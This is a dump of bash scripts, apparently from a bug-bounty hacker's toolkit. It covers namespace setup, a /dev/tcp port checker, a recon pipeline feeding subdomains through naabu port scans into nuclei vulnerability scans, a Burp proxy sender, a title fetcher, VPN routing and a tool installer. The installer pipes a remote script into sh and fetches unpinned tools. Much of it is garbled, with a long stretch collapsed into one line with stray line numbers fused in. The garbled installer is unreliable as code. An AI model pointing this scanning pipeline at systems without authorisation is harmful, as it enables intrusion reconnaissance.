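iptables -t nat -A POSTROUTING -s "${PIP}/24" -o "${IFACE}" -j MASQUERADE

# Default gateway for the new namespace
ip netns exec "${ns}" ip route add default via "${VIP}"

# setting DNS server for the new namespace
# The namespace name becomes part of a path written as root; keep it to a
# plain name without '/' characters.
[[ -d "/etc/netns/${ns}" ]] || mkdir -p "/etc/netns/${ns}"
echo 'nameserver 8.8.8.8' > "/etc/netns/${ns}/resolv.conf"

# running curl to check if new netns can access the internet
ip netns exec "${ns}" curl ipinfo.io || echo "[-] The new network namespace can not access the internet, check The Configuration!"
--------------------------------------------------------------------------------
/port.sh:
--------------------------------------------------------------------------------
#!/bin/bash

red="\e[31m"
green="\e[32m"
end="\e[0m"

[ -z "$1" ] && { echo -e "#Usage:\n\tport "; exit; }

IP=$1

# Report whether a TCP connection to $IP on port $1 can be opened, using
# bash's /dev/tcp pseudo-device inside a subshell.
# NOTE(review): there is no timeout, so a filtered port blocks until the
# kernel gives up on the connection.
SCAN () {
  if (echo 1 > "/dev/tcp/$IP/$1") 2>/dev/null; then
    echo -e "$1 -$green Online$end\n"
  else
    echo -e "$1 -$red Offline$end\n"
  fi
}

# One port as the second argument, or one port per line on stdin.
if [ -z "$2" ]; then
  while read -r PORT; do
    SCAN "$PORT"
  done
else
  PORT=$2
  SCAN "$PORT"
  exit
fi
--------------------------------------------------------------------------------
/reclass.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
# bash script to rename all the files in the given path
#

[ "$1" == "-h" ] && { echo "#Usage:"; echo "reclass [-h] "; exit; }

# $1 is the first number to use; without it, ask for confirmation and start at 1.
if [ -z "$1" ]; then
  read -r -p "[!] Do You Wanna Rename This Directory? [ $(pwd) ] [Ctrl-c to exit]: "
  s=1
else
  s=$1
fi

for i in *; do
  # NOTE(review): without a second argument the whole original name is used
  # as the extension (class-1.<old name>) - confirm this is intended.
  if [ -z "$2" ]; then
    e=$i
  else
    e=$2
  fi
  # Quoted so that names with spaces are tested and renamed correctly;
  # mv -n never overwrites an existing file.
  if [ -f "$i" ] && [[ "$i" != "class"* ]]; then
    mv -n -- "$i" "class-$s.$e"
    s=$((s + 1))
  fi
done

echo "[+] Done!"

--------------------------------------------------------------------------------
/recon.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
# Combined Tools:
# https://github.com/bing0o/SubEnum/
# https://github.com/tomnomnom/hacks/tree/master/filter-resolved
# https://github.com/projectdiscovery/naabu
# https://github.com/tomnomnom/httprobe
# https://github.com/projectdiscovery/nuclei/
#
#

[ -z "$1" ] && { printf "[!] auto.sh \n"; exit; }

temps="$HOME/tools/nuclei-templates/all/"

# Pipeline: subdomains -> resolved -> open ports -> live HTTP hosts -> nuclei.
# naabu runs through sudo by its full path; that path is taken from the
# caller's PATH, so make sure it points at the binary you installed.
subenum -s -d "$1" | tee "subs-$1" | filter-resolved -c 50 | sudo "$(command -v naabu)" -silent -t 50 -ports 80,81,443,3000,6443,8000,8001,8008,8080,8083,8443,8834,8888,9090 | httprobe -c 50 | tee "hosts-$1" | sort -u | nuclei -c 50 -t "$temps" -o "nuclei-$1.logs"


--------------------------------------------------------------------------------
/send-to-burp.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
# Usage: $ ./burp.sh ""
# $ cat URLs.txt | ./burp.sh

# Request one URL through the local intercepting proxy on 127.0.0.1:8080.
# -k is needed because the proxy re-signs TLS with its own certificate.
SEND() {
  # A value starting with '-' would be read by curl as an option.
  case $1 in
    '' | -*) return 1 ;;
  esac
  curl -sk "$1" -x http://127.0.0.1:8080 &>/dev/null
}

# One URL as the argument, or one URL per line on stdin.
if [ -z "$1" ]; then
  while read -r URL; do
    SEND "$URL"
  done
else
  SEND "$1"
fi
--------------------------------------------------------------------------------
/setup-tools.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
# Bash script i use to install some hacking tools
#



printf "update and upgrade:\n"
sudo apt update -y
sudo apt upgrade -y


printf "[*] Setup Your SHELL:\n"
printf "[+] Installing ZSH:\n"
sudo apt install -y zsh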
sudo apt install -y wget git 17 | 18 | printf "[+] Installing OhMyZsh:\n" 19 | export RUNZSH=no 20 | sh -c "$(curl -fsSL https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)" 21 | 22 | printf "[+] Installing Syntax-Highlighting:\n" 23 | git clone https://github.com/zsh-users/zsh-syntax-highlighting.git ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-syntax-highlighting 24 | 25 | printf "[+] Installing ZSH-autosuggestions:\n" 26 | git clone https://github.com/zsh-users/zsh-autosuggestions ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-autosuggestions 27 | 28 | printf "[+] Installing fzf:\n" 29 | git clone --depth 1 https://github.com/junegunn/fzf.git ~/.fzf && ~/.fzf/install 30 | 31 | printf "Oh-My-Tmux:" 32 | sudo apt install -y tmux 33 | cd 34 | git clone https://github.com/gpakosz/.tmux.git 35 | ln -s -f .tmux/.tmux.conf 36 | cp .tmux/.tmux.conf.local . 37 | 38 | printf "[+] Done" 39 | 40 | printf "\n#####################\n\n" 41 | 42 | printf "[*] Setup Your Environment:\n" 43 | printf "[+] Install Golang:\n" 44 | 45 | wget https://golang.org/dl/go1.15.2.linux-amd64.tar.gz -O golang.tar.gz 1>/dev/null 46 | 47 | read -t 120 -p "Enter Path 'GOROOT': " local 48 | [ -z "$local" ] && local=/usr/local && [ -d "$local" ] || mkdir -p "$local" 49 | tar -C $local -xzf golang.tar.gz 1>/dev/null 50 | 51 | mkdir $HOME/bin 52 | mkdir $HOME/tools 53 | export GOROOT=$local/go 54 | export GOPATH=$HOME/go 55 | export PATH=$PATH:$GOROOT/bin:$GOPATH/bin:$HOME/bin 56 | 57 | echo "export GOROOT=$local/go" >> $HOME/.zsh_profile 58 | echo "export GOPATH=$HOME/go" >> $HOME/.zsh_profile 59 | echo 'export PATH=$PATH:$GOROOT/bin:$GOPATH/bin:$HOME/bin' >> $HOME/.zsh_profile 60 | echo 'source $HOME/.zsh_profile' >> $HOME/.zshrc 61 | 62 | source $HOME/.zsh_profile 63 | 64 | printf "[+] Done" 65 | 66 | printf "\n#########################\n\n" 67 | 68 | 69 | printf "[*] Setup Your Tools:\n" 70 | 71 | printf "Make & GCC:\n" 72 | sudo apt install -y make gcc 73 | 74 | printf 
"SubFinder:\n" 75 | GO111MODULE=on go get -u -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder 76 | 77 | printf "Amass:\n" 78 | GO111MODULE=on go get -v github.com/OWASP/Amass/v3/... 79 | 80 | printf "Nuclei:\n" 81 | GO111MODULE=on go get -u -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei 82 | 83 | printf "Nuclei-Templates:\n" 84 | git clone https://github.com/projectdiscovery/nuclei-templates $HOME/tools/nuclei-templates 85 | 86 | printf "HTTProbe:\n" 87 | go get -u github.com/tomnomnom/httprobe 88 | 89 | printf "Assetfinder:\n" 90 | go get -u github.com/tomnomnom/assetfinder 91 | 92 | printf "Gron:\n" 93 | go get -u github.com/tomnomnom/gron 94 | 95 | printf "Filter-Resolved:\n" 96 | go get github.com/tomnomnom/hacks/filter-resolved 97 | 98 | printf "ANew\n" 99 | go get -u github.com/tomnomnom/anew 100 | 101 | printf "Kxss:\n" 102 | go get -u github.com/tomnomnom/hacks/kxss 103 | 104 | printf "GF:\n" 105 | go get -u github.com/tomnomnom/gf 106 | 107 | printf "UnfURL:\n" 108 | go get -u github.com/tomnomnom/unfurl 109 | 110 | printf "FFUF:\n" 111 | go get github.com/ffuf/ffuf 112 | 113 | printf "CF-check:\n" 114 | go get -u github.com/dwisiswant0/cf-check 115 | 116 | printf "Naabu:\n" 117 | GO111MODULE=on go get -v github.com/projectdiscovery/naabu/cmd/naabu 118 | 119 | printf "Gau\n" 120 | GO111MODULE=on go get -u -v github.com/lc/gau 121 | mv "$GOPATH/bin/gau" "$GOPATH/bin/ggau" 122 | 123 | printf "Webanalyze:\n" 124 | go get -u github.com/rverton/webanalyze/... 

# NOTE(review): the `go get` and `git clone` lines in this part name no
# version, tag or commit, so each run installs whatever upstream serves at
# that moment.
printf "Pencode:\n"
go get -u github.com/ffuf/pencode/cmd/pencode

printf "Wuzz:\n"
go get github.com/asciimoo/wuzz

printf "Shuffledns:\n"
GO111MODULE=on go get -u -v github.com/projectdiscovery/shuffledns/cmd/shuffledns

printf "HTTPx:\n"
GO111MODULE=on go get -u -v github.com/projectdiscovery/httpx/cmd/httpx

printf "GoSpider:\n"
go get -u github.com/jaeles-project/gospider

printf "Go-Dork:\n"
GO111MODULE=on go get -v github.com/dwisiswant0/go-dork/...

printf "Hakrawler:\n"
go get github.com/hakluke/hakrawler

printf "Qsreplace:\n"
go get -u github.com/tomnomnom/qsreplace

printf "SubJS:\n"
GO111MODULE=on go get -u -v github.com/lc/subjs

printf "Bash Scripting:\n"
git clone https://github.com/bing0o/bash_scripting/ $HOME/tools/bash_scripting

printf "Python Scripts:\n"
git clone https://github.com/bing0o/Python-Scripts/ $HOME/tools/Python-Scripts

printf "git-dumper:\n"
git clone https://github.com/arthaud/git-dumper $HOME/tools/git-dumper

printf "Arjun:\n"
git clone https://github.com/s0md3v/Arjun $HOME/tools/Arjun

printf "MassDNS:\n"
# NOTE(review): the only apt call in this part without sudo; it fails for a
# non-root user.
apt install -y make
git clone https://github.com/blechschmidt/massdns $HOME/tools/massdns
# Build massdns from the fresh clone and copy the binary into $HOME/bin.
cd $HOME/tools/massdns && make && cp ./bin/massdns $HOME/bin

printf "Chaospy:\n"
git clone https://github.com/dr-0x0x/chaospy $HOME/tools/chaospy

printf "AEM Hacker:\n"
git clone https://github.com/0ang3el/aem-hacker/ $HOME/tools/aem-hacker

printf "SubEum:\n"
# NOTE(review): a script from a branch head is saved into $HOME/bin and made
# executable without review or checksum; read it before the first run.
wget https://raw.githubusercontent.com/bing0o/SubEnum/master/subenum.sh -O $HOME/bin/subenum
chmod +x $HOME/bin/subenum

printf "nmap:\n"
sudo apt install -y nmap

printf "masscan:\n"
sudo apt install -y masscan

printf "JQ:\n"
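sudo apt -y install jq

--------------------------------------------------------------------------------
/title.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
# bash script to check for the title of the page for domains or ips
#
# Both the input list and the fetched pages are untrusted data here:
#   * list entries reach the worker as positional parameters, never spliced
#     into a command string that a shell re-parses;
#   * titles are printed as data, so backslash sequences and control bytes
#     sent by a remote server are not interpreted by the terminal.
#

PRG=${0##*/}
VERSION="2020-05-23"

# Print the help text to stdout.
# Each heredoc line starts with a literal \r so that `read` keeps the
# indentation following it; printf %b then expands the \r and \t escapes.
Usage(){
  while read -r line; do
    printf "%b\n" "$line"
  done <<EOF
\r$PRG:\t\t - Tool reads a list of Domanis or IPs and gives you: The Title of the page.
\r
\rOptions:
\r      -l, --list      - List of Domains or IPs.
\r      -t, --threads   - Threads number (Default: 5).
\r      -o, --output    - The output file to save the results.
\r      -p, --path      - To use a specific path e.g(/robots.txt).
\r      -n, --nocolor   - Disable colored output.
\r      -h, --help      - Displays this Informations and Exit.
\r      -v, --version   - Displays The Version
\rExample:
\r      $PRG -l domains.txt -t 20 -o titles.txt
\r

EOF
}

# Defaults; the literal string "False" means "option not given".
list=False
threads=5
out=False
color=True
path=False

while [ -n "$1" ]; do
  case $1 in
    -l|--list)
      [ -z "$2" ] && { printf "[-] -l/--list needs a File (list of Domains or IPs)\n"; exit 1; }
      list=$2
      shift ;;
    -t|--threads)
      [ -z "$2" ] && { printf "[-] -t/--threads needs a number of threads\n"; exit 1; }
      threads=$2
      shift ;;
    -p|--path)
      [ -z "$2" ] && { printf "[-] -p/--path needs a path ex(/robots.txt)\n"; exit 1; }
      path=$2
      shift ;;
    -o|--output)
      [ -z "$2" ] && { printf "[-] -o/--output needs a file to write the results to.\n"; exit 1; }
      out=$2
      shift ;;
    -h|--help)
      Usage
      exit ;;
    -v|--version)
      printf '%s\n' "$VERSION"
      exit ;;
    -n|--nocolor)
      color=False ;;
    *)
      # The argument is data, not a format string.
      printf '[-] Error: Unknown Options: %s\n' "$1"
      Usage; exit 1 ;;
  esac
  shift
done

# xargs -P takes a non-negative integer (0 = as many processes as possible).
if ! [[ "$threads" =~ ^[0-9]+$ ]]; then
  printf "[-] -t/--threads needs a number of threads\n" >&2
  exit 1
fi

#######################################
# Fetch one target and print "<target> | <title>".
# Arguments:
#   $1 - domain, IP or URL taken from the list (untrusted)
#   $2 - output file, or "False" for none
#   $3 - "True" to colorize the terminal output
#   $4 - path to append to the target, or "False" for none
# Outputs:
#   one line on stdout; the bare title is appended to $2 when set
#######################################
mycurl(){
  local target=$1 outfile=$2 use_color=$3 req_path=$4
  local res green="" blue="" reset=""

  if [[ "$req_path" == False ]]; then
    req_path=""
  elif [[ "$req_path" != "/"* ]]; then
    req_path="/$req_path"
  fi

  # `--` ends curl's option parsing, so a list entry that starts with "-"
  # is treated as a URL and cannot switch on curl options.
  # NOTE(review): the listing this was taken from shows empty lookarounds,
  # (?<=)(.*)(?=), which match every line of the response; the <title> tags
  # look to have been stripped when the page was rendered. Confirm against
  # the upstream file.
  # tr drops control bytes (ESC, CR, ...) except newline, so a hostile page
  # title cannot carry terminal escape sequences into the output or the file.
  res=$(curl --connect-timeout 10 -so - -- "$target$req_path" \
    | grep -iPo '(?<=<title>)(.*)(?=</title>)' \
    | LC_ALL=C tr -d '\000-\011\013-\037\177')

  if [[ "$use_color" == True ]]; then
    green='\e[32m' blue='\e[34m' reset='\e[0m'
  fi

  # %b expands only our own color codes; target and title go through %s.
  printf '%b%s%b | %b%s%b\n' "$blue" "$target" "$reset" "$green" "$res" "$reset"

  if [ "$outfile" != False ]; then
    printf '%s\n' "$res" >> "$outfile"
  fi
}

# Run mycurl over every line of the list, $threads at a time.
# The worker command string is a constant; the list entry and the options are
# passed as arguments ("$@"), so quotes or shell metacharacters inside a list
# line are never re-parsed by the child bash.
main(){
  xargs -I{} -P "$threads" bash -c 'mycurl "$@"' _ {} "$out" "$color" "$path" < "$list"
}

if [ "$list" == False ]; then
  printf "[!] Argument -l/--list is Required!\n"
  Usage
  exit 1
fi

if [ ! -r "$list" ]; then
  printf '[-] Cannot read list file: %s\n' "$list" >&2
  exit 1
fi

# The child bash started by xargs only sees exported functions.
export -f mycurl
main

--------------------------------------------------------------------------------
/vpn_on_vps.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
# sometimes you need to change your VPS' ip using a VPN without losing your ssh connection,
# well, this script does exactly that.
#
# but not sure about DNS leaks and other stuff that could expose your IP,
# be careful when using this method.
#
# 1. SSH to your VPS.
# 2. Run this script.
# 3. Run your VPN client.
#
# your connection will not be closed and the ip of your VPS will be changed.
#
# What it sets up: packets whose source is the current public address are
# looked up in routing table 137, which holds a /24 route on eth0 and a
# default route via the .1 address of that /24.
# NOTE(review): eth0, the /24 prefix and the .1 gateway are hard-coded
# assumptions about the host's network; it also presumes the public address
# is the one configured on the interface (no NAT in front) - confirm with
# `ip addr` and `ip route` before running. Needs root.

# Ask for the public IPv4 address over HTTPS with certificate checking left on:
# the answer decides which routing rules get installed.
myip=$(curl -4 -s --max-time 10 https://ifconfig.me)

# Refuse anything that is not a dotted quad (empty reply, error page, IPv6)
# instead of passing it on to `ip`.
if ! [[ "$myip" =~ ^[0-9]{1,3}(\.[0-9]{1,3}){3}$ ]]; then
  printf '[-] Could not determine the public IPv4 address (got: %q)\n' "$myip" >&2
  exit 1
fi

ip rule add table 137 from "$myip"

# First three octets of the address.
baseip=${myip%.*}

ip route add table 137 to "${baseip}.0/24" dev eth0
ip route add table 137 default via "${baseip}.1"

printf "[+] Now run your Openvpn in a tmux or screen session.!\n"

--------------------------------------------------------------------------------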